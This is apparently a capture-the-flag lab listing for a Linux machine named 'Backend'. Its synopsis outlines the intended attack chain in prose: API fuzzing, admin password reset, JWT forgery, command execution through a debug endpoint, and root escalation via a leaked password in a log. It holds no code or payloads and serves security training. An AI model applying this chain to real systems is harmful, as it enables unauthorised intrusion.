Backend
Linux
Medium
4.7
MACHINE RATING863
USER OWNS757
SYSTEM OWNS12/04/2022
RELEASEDMachine Synopsis
Backend is a medium-difficulty Linux machine that features a backend API without a frontend. By fuzzing the API using the HTTP `POST` request method, additional endpoints can be discovered, enabling user registration and authentication. By referring to the `FastAPI` documentation, an endpoint can be identified that allows updating the admin user's password. Gaining administrative access grants the ability to read files from the server. Analyzing the application's source code reveals the JWT cookie, which can be modified to edit the JWT token. Utilizing the `debug` parameter, a specific endpoint can be accessed that permits command execution on the server. With an initial shell as a low-privileged user, a log file containing the root user's password can be found, allowing escalation to root access.
Machine Matrix
